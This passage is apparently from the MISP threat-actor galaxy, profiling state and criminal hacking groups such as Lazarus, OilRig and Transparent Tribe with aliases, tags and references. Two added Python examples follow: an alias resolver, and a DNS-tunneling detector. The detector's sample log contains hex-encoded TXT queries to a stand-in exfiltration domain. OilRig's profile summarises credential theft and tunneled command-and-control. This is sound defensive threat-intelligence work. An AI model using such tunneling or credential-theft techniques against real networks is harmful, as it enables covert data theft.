https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/

https://www.theregister.co.uk/2019/04/10/lazarus_group_malware/

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/a-look-into-the-lazarus-groups-operations

https://www.kaspersky.com/about/press-releases/2017_chasing-lazarus-a-hunt-for-the-infamous-hackers-to-prevent-large-bank-robberies

https://medium.com/threat-intel/lazarus-attacks-wannacry-5fdeddee476c

https://attack.mitre.org/groups/G0032/

https://threatpost.com/lazarus-apt-spinoff-linked-to-banking-hacks/124746/

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.bankinfosecurity.com/vietnamese-bank-blocks-1-million-online-heist-a-9105

https://www.reuters.com/article/us-cyber-heist-swift-specialreport-idUSKCN0YB0DD

https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware

https://blog.trendmicro.com/trendlabs-security-intelligence/what-we-can-learn-from-the-bangladesh-central-bank-cyber-heist/

https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware

https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html

https://www.bloomberg.com/news/articles/2018-05-29/mexico-foiled-a-110-million-bank-heist-then-kept-it-a-secret

https://threatpost.com/banco-de-chile-wiper-attack-just-a-cover-for-10m-swift-heist/132796/

https://www.darkreading.com/attacks-breaches/north-korean-hacking-group-steals-$135-million-from-indian-bank-/d/d-id/1332678

https://www.zdnet.com/article/north-korean-hackers-infiltrate-chiles-atm-network-after-skype-job-interview/

https://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html

https://www.secureworks.com/research/threat-profiles/nickel-gladstone

https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html

https://www.welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/

https://dragos.com/adversaries.html

https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf

https://www.cfr.org/interactive/cyber-operations/covellite

https://www.hvs-consulting.de/lazarus-report/

https://github.com/hvs-consulting/ioc_signatures/tree/main/Lazarus_APT37

https://blogs.jpcert.or.jp/en/2021/01/Lazarus_tools.html

https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html

https://attack.mitre.org/groups/G0082

https://attack.mitre.org/groups/G0032

https://www.microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/

https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds

https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists
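The alias lists above show why automated tagging needs care: "Andariel" is listed under both Silent Chollima and Lazarus Group, and "APT38" and "APT 38" are the same name spelled two ways. The script below is an added example for this page, not code from the MISP project or its galaxy JSON. It builds an alias index from a cluster fragment constructed here from the entries above, resolves reported names to canonical cluster values and the corresponding misp-galaxy tag strings, flags ambiguous aliases for analyst review, and resolves the related-cluster entries with their estimative-language likelihood. The UUIDs are placeholders, the field layout (values[].value, meta.synonyms, related[].dest-uuid/type/tags) is assumed to match the published cluster JSON, and the case-, space- and hyphen-insensitive normalization is a choice made for this example.

```python
"""Resolve reported actor names against a MISP galaxy threat-actor cluster."""
import json
import re
from collections import defaultdict

# Constructed cluster fragment assembled from entries on this page; the UUIDs
# are placeholders, and the field layout (values[].value, meta.synonyms,
# related[].dest-uuid/type/tags) is assumed to match the published cluster JSON.
CLUSTER_JSON = json.dumps({
    "type": "threat-actor",
    "values": [
        {"uuid": "00000000-0000-4000-8000-000000000001",
         "value": "Lazarus Group",
         "meta": {"synonyms": ["Hidden Cobra", "APT38", "APT 38", "Andariel",
                               "Labyrinth Chollima", "Zinc", "ZINC"]},
         "related": [
             {"dest-uuid": "00000000-0000-4000-8000-000000000004",
              "type": "similar",
              "tags": ['estimative-language:likelihood-probability="likely"']},
             {"dest-uuid": "00000000-0000-4000-8000-000000000005",
              "type": "linked-to",
              "tags": ['estimative-language:likelihood-probability="likely"']}]},
        {"uuid": "00000000-0000-4000-8000-000000000002",
         "value": "Silent Chollima",
         "meta": {"synonyms": ["Andariel", "WHOis Team", "Onyx Sleet"]}},
        {"uuid": "00000000-0000-4000-8000-000000000003",
         "value": "WOLF SPIDER",
         "meta": {"synonyms": ["FIN4", "G0085"]}},
        {"uuid": "00000000-0000-4000-8000-000000000004",
         "value": "Operation Sharpshooter"},
        {"uuid": "00000000-0000-4000-8000-000000000005",
         "value": "APT37"},
    ],
})

LIKELIHOOD_PREFIX = "estimative-language:likelihood-probability="


def load_cluster(text: str = CLUSTER_JSON) -> dict:
    """Parse a cluster JSON document (defaults to the constructed fragment)."""
    return json.loads(text)


def norm(name: str) -> str:
    """Case-, space- and hyphen-insensitive key, so 'APT 38' == 'apt-38'."""
    return re.sub(r"[\s\-_]+", "", name.lower())


def build_index(cluster: dict) -> dict:
    """Map normalised name or synonym -> set of canonical cluster values."""
    index = defaultdict(set)
    for entry in cluster["values"]:
        index[norm(entry["value"])].add(entry["value"])
        for syn in entry.get("meta", {}).get("synonyms", []):
            index[norm(syn)].add(entry["value"])
    return index


def resolve(index: dict, name: str):
    """Return ('exact' | 'ambiguous' | 'unknown', sorted candidate values)."""
    hits = sorted(index.get(norm(name), ()))
    if not hits:
        return "unknown", []
    if len(hits) > 1:
        return "ambiguous", hits  # e.g. Andariel sits under two clusters
    return "exact", hits


def galaxy_tag(value: str, cluster_type: str = "threat-actor") -> str:
    """The tag string MISP attaches for a cluster value."""
    return f'misp-galaxy:{cluster_type}="{value}"'


def tags_for_report(cluster: dict, names):
    """Tags for names that resolve uniquely; the rest go back for analyst review."""
    index = build_index(cluster)
    tags, review = set(), {}
    for name in names:
        status, hits = resolve(index, name)
        if status == "exact":
            tags.add(galaxy_tag(hits[0], cluster["type"]))
        else:
            review[name] = (status, hits)
    return sorted(tags), review


def related_values(cluster: dict, value: str):
    """(relationship type, related value, likelihood) for one cluster value."""
    by_uuid = {e["uuid"]: e["value"] for e in cluster["values"]}
    out = []
    for entry in cluster["values"]:
        if entry["value"] != value:
            continue
        for rel in entry.get("related", []):
            likelihood = None
            for tag in rel.get("tags", []):
                if tag.startswith(LIKELIHOOD_PREFIX):
                    likelihood = tag[len(LIKELIHOOD_PREFIX):].strip('"')
            dest = by_uuid.get(rel["dest-uuid"], rel["dest-uuid"])
            out.append((rel["type"], dest, likelihood))
    return out


if __name__ == "__main__":
    cluster = load_cluster()
    tags, review = tags_for_report(cluster, ["FIN4", "hidden cobra", "Andariel", "Onyx Sleet"])
    print(tags)
    print(review)
    print(related_values(cluster, "Lazarus Group"))
```

The point of the review dictionary is that an ambiguous alias is never silently mapped to the first match; on a real galaxy the index is built from the full threat-actor cluster, and the same collision check is worth running when a new cluster version is imported, since synonym lists change between releases.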

VICEROY TIGER

VICEROY TIGER is an adversary with a nexus to India that has historically targeted entities throughout multiple sectors. Older activity targeted multiple sectors and countries; however, since 2015 this adversary appears to focus on entities in Pakistan with a particular focus on government and security organizations. This adversary consistently leverages spear phishing emails containing malicious Microsoft Office documents, malware designed to target the Android mobile platform, and phishing activity designed to harvest user credentials. In March 2017, the 360 Chasing Team identified samples from targeted attacks by a previously unknown APT group whose activity can now be traced back to at least April 2016; the team named the group APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered new attack activity by the group, confirmed and exposed its targeted attacks against Pakistan, and analyzed in detail the unique EHDevel malicious code framework the group uses.

The tag is: misp-galaxy:threat-actor="VICEROY TIGER"

VICEROY TIGER is also known as:

  • OPERATION HANGOVER

  • Donot Team

  • APT-C-35

  • SectorE02

  • Orange Kala

VICEROY TIGER has relationships with:

  • similar: misp-galaxy:360net-threat-actor="摩诃草 - APT-C-09" with estimative-language:likelihood-probability="likely"

Table 11827. Table References

Links

https://github.com/jack8daniels2/threat-INTel/blob/master/2013/Unveiling-an-Indian-Cyberattack-Infrastructure-appendixes.pdf

https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/

https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia

https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china-en/

https://www.crowdstrike.com/blog/viceroy-tiger-delivers-new-zero-day-exploit/index.html

https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/

https://unit42.paloaltonetworks.com/threat-assessment-hangover-threat-group/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://blog.cyble.com/2021/07/22/donot-apt-group-delivers-a-spyware-variant-of-chat-app/

https://adversary.crowdstrike.com/en-US/adversary/viceroy-tiger

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

PIZZO SPIDER

The tag is: misp-galaxy:threat-actor="PIZZO SPIDER"

PIZZO SPIDER is also known as:

  • DD4BC

  • Ambiorx

Table 11828. Table References

Links

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

Corsair Jackal

The tag is: misp-galaxy:threat-actor="Corsair Jackal"

Corsair Jackal is also known as:

  • TunisianCyberArmy

Table 11829. Table References

Links

https://web.archive.org/web/20160315044507/https://www.crowdstrike.com/blog/regional-conflict-and-cyber-blowback/

SNOWGLOBE

In 2014, researchers at Kaspersky Lab discovered and reported on three zero-days that were being used in cyberattacks in the wild. Two of these zero-day vulnerabilities are associated with an advanced threat actor we call Animal Farm. Over the past few years, Animal Farm has targeted a wide range of global organizations. The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007.

The tag is: misp-galaxy:threat-actor="SNOWGLOBE"

SNOWGLOBE is also known as:

  • Animal Farm

  • Snowglobe

  • ATK8

Table 11830. Table References

Links

https://securelist.com/blog/research/69114/animals-in-the-apt-farm/

https://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france

https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/

https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/

https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope

https://www.cfr.org/interactive/cyber-operations/snowglobe

https://resources.infosecinstitute.com/animal-farm-apt-and-the-shadow-of-france-intelligence/

Deadeye Jackal

The Syrian Electronic Army (SEA) is a group of computer hackers which first surfaced online in 2011 to support the government of Syrian President Bashar al-Assad. Using spamming, website defacement, malware, phishing, and denial of service attacks, it has targeted political opposition groups, western news organizations, human rights groups and websites that are seemingly neutral to the Syrian conflict. It has also hacked government websites in the Middle East and Europe, as well as US defense contractors. As of 2011, Syria was the first Arab country to have a public Internet Army hosted on its national networks to openly launch cyber attacks on its enemies. The precise nature of the SEA’s relationship with the Syrian government has changed over time and is unclear.

The tag is: misp-galaxy:threat-actor="Deadeye Jackal"

Deadeye Jackal is also known as:

  • SyrianElectronicArmy

  • SEA

Table 11831. Table References

Links

https://en.wikipedia.org/wiki/Syrian_Electronic_Army

Operation C-Major

Group targeting Indian Army or related assets in India, as well as activists and civil society in Pakistan. Attribution to a Pakistani connection has been made by TrendMicro and others.

The tag is: misp-galaxy:threat-actor="Operation C-Major"

Operation C-Major is also known as:

  • C-Major

  • Transparent Tribe

  • Mythic Leopard

  • ProjectM

  • APT36

  • APT 36

  • TMP.Lapis

  • Green Havildar

  • COPPER FIELDSTONE

  • Earth Karkaddan

Operation C-Major has relationships with:

  • similar: misp-galaxy:360net-threat-actor="透明部落 - APT-C-56" with estimative-language:likelihood-probability="likely"

Table 11832. Table References

Links

http://documents.trendmicro.com/assets/pdf/Indian-military-personnel-targeted-by-information-theft-campaign-cmajor.pdf

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

https://www.amnesty.org/en/documents/asa33/8366/2018/en/

https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/

https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe

https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf

https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf

https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials

https://s.tencent.com/research/report/669.html

https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html

https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/

Stealth Falcon

This threat actor targets civil society groups and Emirati journalists, activists, and dissidents.

The tag is: misp-galaxy:threat-actor="Stealth Falcon"

Stealth Falcon is also known as:

  • FruityArmor

  • G0038

Stealth Falcon has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Stealth Falcon - G0038" with estimative-language:likelihood-probability="likely"

Table 11833. Table References

Links

https://citizenlab.ca/2016/05/stealth-falcon/

https://www.cfr.org/interactive/cyber-operations/stealth-falcon

https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/

https://attack.mitre.org/groups/G0038/

HummingBad

This group created malware that takes over Android devices and generates $300,000 per month in fraudulent ad revenue. The group effectively controls an arsenal of over 85 million mobile devices around the world, with the potential to sell access to these devices to the highest bidder.

The tag is: misp-galaxy:threat-actor="HummingBad"

Table 11834. Table References

Links

http://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf

QUILTED TIGER

Dropping Elephant (also known as “Chinastrats” and “Patchwork”) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools. Its victims are all involved with China’s foreign relations in some way, and are generally caught through spear-phishing or watering hole attacks.

The tag is: misp-galaxy:threat-actor="QUILTED TIGER"

QUILTED TIGER is also known as:

  • Chinastrats

  • Patchwork

  • Monsoon

  • Sarit

  • Dropping Elephant

  • APT-C-09

  • ZINC EMERSON

  • ATK11

  • G0040

  • Orange Athos

  • Thirsty Gemini

QUILTED TIGER has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Patchwork - G0040" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="MONSOON - G0042" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="摩诃草 - APT-C-09" with estimative-language:likelihood-probability="likely"

Table 11835. Table References

Links

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=09308982-77bd-41e0-8269-f2cc9ce3266e&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign

https://www.cymmetria.com/patchwork-targeted-attack/

https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

https://attack.mitre.org/groups/G0040/

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

https://securelist.com/the-dropping-elephant-actor/75328/

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

https://www.secureworks.com/research/threat-profiles/zinc-emerson

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait

https://unit42.paloaltonetworks.com/atoms/thirstygemini/

Scarlet Mimic

Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group’s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda (APT 2), it has not been concluded that the groups are the same. The attacks began over four years ago and their targeting pattern suggests that this adversary’s primary mission is to gather information about minority rights activists. We do not have evidence directly linking these attacks to a government source, but the information derived from these activities supports an assessment that a group or groups with motivations similar to the stated position of the Chinese government in relation to these targets is involved. The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes. Both the Tibetan community and the Uyghurs, a Turkic Muslim minority residing primarily in northwest China, have been targets of multiple sophisticated attacks in the past decade. Both also have a history of strained relationships with the government of the People’s Republic of China (PRC), though we do not have evidence that links Scarlet Mimic attacks to the PRC. Scarlet Mimic attacks have also been identified against government organizations in Russia and India, which are responsible for tracking activist and terrorist activities. While we do not know the precise target of each of the Scarlet Mimic attacks, many of them align to the patterns described above.

The tag is: misp-galaxy:threat-actor="Scarlet Mimic"

Scarlet Mimic is also known as:

  • G0029

  • Golfing Taurus

Scarlet Mimic has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Scarlet Mimic - G0029" with estimative-language:likelihood-probability="likely"

Table 11836. Table References

Links

https://attack.mitre.org/wiki/Groups

https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/groups/G0029/

https://unit42.paloaltonetworks.com/atoms/golfing-taurus/

Poseidon Group

Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm.

The tag is: misp-galaxy:threat-actor="Poseidon Group"

Poseidon Group is also known as:

  • G0033

Poseidon Group has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Poseidon Group - G0033" with estimative-language:likelihood-probability="likely"

Table 11837. Table References

Links

https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/

https://attack.mitre.org/wiki/Groups

https://attack.mitre.org/groups/G0033/

DragonOK

Threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT.

The tag is: misp-galaxy:threat-actor="DragonOK"

DragonOK is also known as:

  • Moafee

  • BRONZE OVERBROOK

  • G0017

  • G0002

  • Shallow Taurus

DragonOK has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Moafee - G0002" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="DragonOK - G0017" with estimative-language:likelihood-probability="likely"

Table 11838. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf

https://attack.mitre.org/wiki/Groups

https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor

https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf

https://www.cfr.org/interactive/cyber-operations/moafee

https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/

https://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/

https://www.phnompenhpost.com/national/kingdom-targeted-new-malware

https://attack.mitre.org/groups/G0017/

https://attack.mitre.org/groups/G0002/

https://www.secureworks.com/research/threat-profiles/bronze-overbrook

https://unit42.paloaltonetworks.com/atoms/shallowtaurus/

ProjectSauron

ProjectSauron is the name for a top level modular cyber-espionage platform, designed to enable and manage long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods. Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes. As such, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Usually APT campaigns have a geographical nexus, aimed at extracting information within a specific region or from a given industry. That usually results in several infections in countries within that region, or in the targeted industry around the world. Interestingly, ProjectSauron seems to be dedicated to just a couple of countries, focused on collecting high value intelligence by compromising almost all key entities it could possibly reach within the target area. The name, ProjectSauron reflects the fact that the code authors refer to ‘Sauron’ in the Lua scripts.

The tag is: misp-galaxy:threat-actor="ProjectSauron"

ProjectSauron is also known as:

  • Strider

  • Sauron

  • Project Sauron

  • G0041

ProjectSauron has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Strider - G0041" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="索伦之眼 - APT-C-16" with estimative-language:likelihood-probability="likely"

Table 11839. Table References

Links

https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/

https://www.cfr.org/interactive/cyber-operations/project-sauron

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf

https://attack.mitre.org/groups/G0041/

TA530

TA530 is a threat actor that Proofpoint previously examined in relation to large-scale personalized phishing campaigns.

The tag is: misp-galaxy:threat-actor="TA530"

Table 11840. Table References

Links

https://www.proofpoint.com/uk/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene

GCMAN

GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services.

The tag is: misp-galaxy:threat-actor="GCMAN"

GCMAN is also known as:

  • G0036

GCMAN has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="GCMAN - G0036" with estimative-language:likelihood-probability="likely"

Table 11841. Table References

Links

https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/

https://attack.mitre.org/groups/G0036/

FIN6

FIN6 is a group targeting financial assets, including systems able to perform financial transactions such as point-of-sale (PoS) systems.

The tag is: misp-galaxy:threat-actor="FIN6"

FIN6 is also known as:

  • SKELETON SPIDER

  • ITG08

  • MageCart Group 6

  • White Giant

  • GOLD FRANKLIN

  • ATK88

  • G0037

  • Camouflage Tempest

FIN6 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="FIN6 - G0037" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="FrameworkPOS - S0503" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="Camouflage Tempest" with estimative-language:likelihood-probability="likely"

Table 11843. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

https://attack.mitre.org/groups/G0037/

https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

http://www.secureworks.com/research/threat-profiles/gold-franklin

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

Libyan Scorpions

Libyan Scorpions is a malware operation in use since September 2015, run by a politically motivated group whose main objectives are intelligence gathering, spying on influential and political figures, and running an espionage campaign within Libya.

The tag is: misp-galaxy:threat-actor="Libyan Scorpions"

TeamXRat

The tag is: misp-galaxy:threat-actor="TeamXRat"

TeamXRat is also known as:

  • CorporacaoXRat

  • CorporationXRat

Table 11844. Table References

Links

https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/

OilRig

OilRig is an Iranian threat group operating primarily in the Middle East by targeting organizations in this region that are in a variety of different industries; however, this group has occasionally targeted organizations outside of the Middle East as well. It also appears OilRig carries out supply chain attacks, where the threat group leverages the trust relationship between organizations to attack their primary targets.

OilRig is an active and organized threat group, which is evident from its systematic targeting of specific organizations that appear to be carefully chosen for strategic purposes. Attacks attributed to this group rely primarily on social engineering, exploiting people rather than software vulnerabilities; on occasion, however, the group has used recently patched vulnerabilities in the delivery phase of its attacks. The lack of software vulnerability exploitation does not necessarily suggest a lack of sophistication, as OilRig has shown maturity in other aspects of its operations, including:

  • Organized evasion testing during the development of their tools.

  • Use of custom DNS tunneling protocols for command and control (C2) and data exfiltration.

  • Custom web shells and backdoors used to persistently access servers.

OilRig relies on stolen account credentials for lateral movement. After gaining access to a system, the group uses credential dumping tools such as Mimikatz to steal the credentials of accounts logged into the compromised host, then uses those credentials to move laterally to other systems on the network. Once it holds valid credentials, the group prefers to reach compromised systems with tools other than its backdoors, such as Remote Desktop and PuTTY. OilRig also uses phishing sites to harvest credentials from individuals at targeted organizations in order to access internet-facing resources such as Outlook Web Access.
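The DNS tunneling mentioned above (C2 and exfiltration carried in query names) is visible in resolver logs even when the payload is opaque. The following is an added example, not code from the OilRig reports or from MISP, of the per-domain statistics a detection engineer would compute over DNS query logs: subdomain entropy and length, how rarely a subdomain repeats, and the share of TXT/NULL queries. The log lines, the `.example` zone, the log format and the thresholds are all constructed here; the registered-domain split assumes two trailing labels, where a production rule would use the Public Suffix List.

```python
import math
from collections import defaultdict

# Constructed DNS query log (not real OilRig traffic): "<epoch> <client> <qtype> <qname>".
# The ".example" zone is reserved for documentation; the long hex labels mimic
# chunked data carried in subdomains.
SAMPLE_LOG = """\
1700000000 10.0.0.5 A www.example.com
1700000001 10.0.0.5 A mail.example.com
1700000002 10.0.0.7 A cdn.example.net
1700000003 10.0.0.9 TXT 3a6f1b9c2e4d8f0a1b2c3d4e5f60718293a4b5c6.evil-updates.example
1700000004 10.0.0.9 TXT 9c8b7a6f5e4d3c2b1a0f9e8d7c6b5a4f3e2d1c0b.evil-updates.example
1700000005 10.0.0.9 TXT 0f1e2d3c4b5a69788796a5b4c3d2e1f001122334.evil-updates.example
1700000006 10.0.0.9 TXT ab12cd34ef56ab78cd90ef12ab34cd56ef78ab90.evil-updates.example
1700000007 10.0.0.5 A www.example.com
1700000008 10.0.0.9 TXT deadbeefcafef00d0123456789abcdef01234567.evil-updates.example
1700000009 10.0.0.9 TXT 1234567890abcdef1234567890abcdef12345678.evil-updates.example
"""

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded/encrypted chunks score high, words score low."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def split_qname(qname: str, zone_labels: int = 2):
    """Split 'sub.labels.domain.tld' into (subdomain, registered_domain).
    Assumption: the registered domain is the last `zone_labels` labels."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= zone_labels:
        return "", ".".join(labels)
    return ".".join(labels[:-zone_labels]), ".".join(labels[-zone_labels:])

def parse_log(text: str):
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the batch
        ts, client, qtype, qname = parts
        records.append((int(ts), client, qtype.upper(), qname))
    return records

def score_domains(records):
    """Aggregate per registered domain and compute tunneling indicators."""
    per = defaultdict(list)
    for _ts, _client, qtype, qname in records:
        sub, dom = split_qname(qname)
        per[dom].append((sub, qtype))
    stats = {}
    for dom, items in per.items():
        subs = [s for s, _ in items]
        n = len(items)
        stats[dom] = {
            "queries": n,
            "mean_entropy": sum(shannon_entropy(s) for s in subs) / n,
            "mean_sub_len": sum(len(s) for s in subs) / n,
            # tunnels rarely repeat a query name, so nearly every subdomain is unique
            "distinct_ratio": len(set(subs)) / n,
            "txt_ratio": sum(1 for _, q in items if q in ("TXT", "NULL")) / n,
        }
    return stats

def flag_tunnels(stats, min_queries=5, entropy=3.5, sub_len=30, distinct=0.8,
                 txt=0.5, allowlist=()):
    """Flag a domain when at least three of the four indicators trip.
    Thresholds are illustrative; tune them against your own resolver baseline."""
    flagged = []
    for dom, s in stats.items():
        if dom in allowlist or s["queries"] < min_queries:
            continue
        hits = sum([s["mean_entropy"] >= entropy, s["mean_sub_len"] >= sub_len,
                    s["distinct_ratio"] >= distinct, s["txt_ratio"] >= txt])
        if hits >= 3:
            flagged.append(dom)
    return sorted(flagged)

def detect_tunnels(log_text: str, allowlist=()):
    return flag_tunnels(score_domains(parse_log(log_text)), allowlist=allowlist)

if __name__ == "__main__":
    for dom, s in score_domains(parse_log(SAMPLE_LOG)).items():
        print(dom, {k: round(v, 2) for k, v in s.items()})
    print("flagged:", detect_tunnels(SAMPLE_LOG))
```

Expect false positives from legitimate services that encode data in query names (anti-malware reputation lookups, some CDNs and telemetry agents); the `allowlist` parameter exists for exactly those, and a volume-over-time view per client is the next refinement, since a tunnel from one host is far more suspicious than the same statistics spread across the whole estate.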

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government.

The tag is: misp-galaxy:threat-actor="OilRig"

OilRig is also known as:

  • Twisted Kitten

  • Cobalt Gypsy

  • Crambus

  • Helix Kitten

  • APT 34

  • APT34

  • IRN2

  • ATK40

  • G0049

  • Evasive Serpens

  • Hazel Sandstorm

  • EUROPIUM

  • TA452

OilRig has relationships with:

